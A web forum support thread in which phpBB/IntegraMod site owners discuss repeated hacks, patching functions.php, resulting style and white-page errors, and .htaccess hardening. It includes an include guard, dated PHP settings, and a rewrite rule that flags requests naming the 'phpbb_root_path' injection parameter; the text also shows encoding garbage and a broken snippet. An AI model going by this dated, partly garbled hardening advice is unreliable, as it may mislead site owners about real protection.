&quot;The 4WM home page just has a message box under the normal 4WM header saying à¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€¦Ã¢â‚¬Å“Could not find style name 0.à¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€š

[tekguru]

That was a secondary issue which was fixed by resetting all users to use the default style.

We still get the 'Hacking attempt' messge though when we try to change style via either the changer of via command line as per:

http://www.4winmobile.com/portal.php?s=Mobile

So any more ideas?

[honie]

Ok, I applied the patches & it made my site got "white" .. I really dont want to continue getting hacked everyday. Any ideas?

[Vadar]

From personal experience I highly recommend that you get a pristine copy of functions.php and then apply the fixes to that. I had similar problems due to adding the final fixes to a previously "fixed" copy of functions.php (I had been modding it along the way as things were posted.) As soon as I took an unmodded copy of functions.php and applied the latest fixes, everything worked. Don't know if it was my inperfect application of the fixes or a conflict with an earlier fix, but if you haven't tried this I recommend you start with it.

[tekguru]

It might be the way to go, I was thinking of that, as IIRC the only Mods applied are those for M2F, and they are easy enough to add in.

[Oracle_SOD]

our site was also hacked numerous times and i dont have time to mod php files and would rather just dump a clean install of IM Portal (we have had too many speed issues with Integramod)

so my question would be,
Have these fixes been applied to the IM Portal and Integramod download files ?

and if not, when will they be ?

[Michaelo]

Vadar probably has it right here... If you have made any of the previous fixes this will save you time and should set things straight... <img>
Mike

Explanation: If you are having problems with white pages or links in your site obtain a fresh copy of functions.php from your original source and add the latest updates from Security Forum 2nd post, 1st fix and replace the functions.php on your site.

Mike

[Oracle_SOD]

sorry ? not sure what you are answering there

[Unregistered]

hi, am not sure whether this is the rite topic to post this..

i think we need to patch one more hole.. look at
pafiledb/includes/pafiledb_constants.php

am sure we need to put

Code: Select all

if ( !defined('IN_PHPBB') ){   die ("Hacking attempt!");}    

correct me if am not wrong.. <img>

[Drop-Forged]

Dont see how it could hurtà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦


I did some investigating on php security (mind you Im certainly no expert) and I found a page that seemed to have some good advise for making php more secure with .htaccess.

[url=http]Click Here[/url] for the page


Here is the .htaccess settings:

Code: Select all

   # set register globals off  php_value register_globals 0    # set allow_url_fopen off  php_value allow_url_fopen 0    # set magic_quotes_gpc off  php_value magic_quotes_gpc 0    # set magic_quotes_runtime off  php_value magic_quotes_runtime 0

Ive tryed them on my site, so far everything seemed to be working.

Anyone know anything about these, if we should, or should not use the.

[adbasque]

Hello everybody

I am sorry to have to say i ead here about .htaccess file as the solution for protections

First these options may apply to certain people only

for example if your site is hosted by a third party, and only if you don't have access to the server's files, then you may apply an htaccess file to a specific directory, and all the subdirectories thereof.

for those who wants an .htaccess wizard generator
follow this link, but please be sure to read everything before using it, because an .htaccess file can compromise the whole of the authentication to your site or webserver. please use with care.

http://developers.evrsoft.com/tools-hta ... ator.shtml

read as much as you possibly can about this little "devil" file lol

Good luck everyone

[adbasque]

Hello again

I just had an idea that i would love to share with you all, and if you think it's a lousy idea, then forget it, but i know a lot people who used this technique, with .htaccess file.


is to redirect the whole of your site to another new site example.

when a user clicks on
http://www.hostname.com/you_folder/portal.php

he/she will be redirected to

http://www.hostname/your_new_site/portal.php
you can block access to the first "oldsite" and it will only redirect to the new site which is identical the old one, of course you have to keep the new site updated on regular basis
to use deny from all.
I think it can help to discourage hackers, not to stop them obviously but make their lives miserable.

Please let me know what you think
Thanks

[tekguru]

Well fresh copy of the code added with the fixes freshly applied - cross fingers!

[honie]

I have tried the updates on a fresh funtions.php 3 times and it still goes white. Before applying the fix I no longer have the left side links in the ACP and am unable to view any posts at all.

[Rabi]

I have tried the updates on a fresh funtions.php 3 times and it still goes white. Before applying the fix I no longer have the left side links in the ACP and am unable to view any posts at all.

I Have the same problem.

If I in the ACP something change, I get a white side!
Only if I copy the secured “Includesâ€

[adbasque]

Hi everyone

I have a small question for you guys.
if i needed to make a fresh install using Integramod 1.4.0, and use phpBB 2.0.21 or 2.0.20?

Because at the moment i am using intergramod1.4.0 but in order to update it, i have a long way to go, from phpBB 2.0.17.
so can i make a fresh install of 140 with 2.0.21, how can i do that, please?

I know there's the new release but it's still a beta release, which means if i install it now and if it turns out with lots of bugs i have to remove it and start all over again.

i don't mind installing it for tests to help you guys, to see if it has any bugs or problems, but for the live site i'd rather use something more stable.

Thank you all

[honie]

I have tried the updates on a fresh funtions.php 3 times and it still goes white. Before applying the fix I no longer have the left side links in the ACP and am unable to view any posts at all.

I Have the same problem.

If I in the ACP something change, I get a white side!
Only if I copy the secured “Includesâ€

[tekguru]

Well patches all applied from scratch and a good percentage of users are still reporting:

"I'm seeing a 'General Error' in the Index. Box in the middle of the page just says Could not find style name 0"

I've rebuilt all the styles / caches but no difference. And no there is no style 0 is the database or anywhere I can see so there has to a problem with the patch.

HELP!

[Fubie]

I tried this http://integramod.com/forum/viewtopic.php?t=1979 on a backed up IM140 phpbb2.0.17 forum and it worked very well. The forum updated to IM 1.40 phpbb 2.0.21 with Rev5 update patches.

[Michaelo]

Additional Edits to functions.php re style 0

The first path of the code is causing the problems in functions.phpà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦ it is incorrect as it make no sense... first off the code that calls the function passes an integer but the first few line of code requires a string... see code

WHERE style_name = '$style'

i.e. the style_name variable is a string (the actual style name)... and is used to return the style id for the next processà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

This code makes no sense and needs work. I gather the errors stem from an old edit with CH but for now it is not required as we pass the $Style id in the calling codeà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦ so it is not requiredà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

Code: Select all

 Find];  

This may require additional edits but for now this should solve some problemsà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦
Note the change style block also has the same errorsà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦. Later

[tekguru]

Cheers Michaelo will give this a try. Will you be updatign the first post in the thread so that this Mod can be easily incorporated by others?

[Michaelo]

I am looking at the entire function to determine why the code is as is? Once I have determined what was intended I will update the post but for now its for people who are having trouble...

I will also have to rewrite the change style mod as it uses the same strange code... more later...
Mike

[jwernerny]

...I found a page that seemed to have some good advise for making php more secure with .htaccess.

I have added one more that may or may not actually do something....

Code: Select all

 RewriteEngine onRewriteRule phpbb_root_path hacker_trying_again [L]  

If it does what I think it does, it will rewrite the string "phpbb_root_path" with "hacker_trying_again". I suppose the following would be even more interesting as it would redirect everything containing that string to a web page.

Code: Select all

 RewriteRule (.*)phpbb_root_path(.*) /hacking_attempt.cgi?first=$1&last=$2  

One could even get cleverer and store the first and last parts to see what they were trying.

- John

[tekguru]

Cheers for the update Mike, waiting on your wisdom <img>

[evolver]

Hey guys, I have just added the lines of code and I'm now getting this issue.

Parse error: syntax error, unexpected ':' in /home/westtexas/www/www/phpBB2/includes/functions.php on line 29

Any clues?

Yes: functions.php 2 fixes
You've most probably done just one placement...

The only ] I can see is in [b]Find[color=red]]
And that would be on line 29 if you placed it all together...
That's no code, that's where the second fix starts! <img>

[macarlisle]

Sorry about that, I didnt pay attiontion to entire line of code.

[evolver]

Sorry about that, I didnt pay attiontion to entire line of code.

No Problem
You are not the first, and I'm sure that it happens to many more who don't even dare to ask...

The answer to your problem will help them as well... <img>

[tekguru]

One other interesting one concerning these changes....

Ref the style change we use a couple of links in QBar on the menu to swap styles between 'full' and 'mobile, such as:

http://www.4winmobile.com/portal.php?s=21

This works great on the PC, but not on any Windows Mobile machine using Pocket Internet Explorer.

Anyone any ideas why?

No matter which style is set that way we end up with the full default style loading.

[Michaelo]

Can we see the code in QBar?

[tekguru]

Now that one is easy:

[flash=,:2jizgjxf]http://www.4winmobile.com/news/qbar.png[/flash:2jizgjxf]

Does that help?

[Michaelo]

You are calling portal with s=2... I assume you have added code to the portal.php at some point...
Can you post a ziped copy of it.

Mike